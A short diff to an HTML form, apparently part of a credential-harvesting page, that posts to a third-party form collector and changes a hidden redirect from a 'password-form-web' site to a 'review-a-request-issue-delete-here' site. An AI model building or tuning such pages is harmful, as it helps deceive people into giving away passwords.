--- a/request.html
+++ b/request.html
@@ -10,7 +10,7 @@
     </head>
     <body>
         <form action="https://submit-form.com/YD2bQW9MG" method="post">
-            <input type="hidden" name="_redirect" value="https://password-form-web.vercel.app/"/>
+            <input type="hidden" name="_redirect" value="https://review-a-request-issue-delete-here.vercel.app/"/>
             <div id="root">
                 <div>
                     <form>
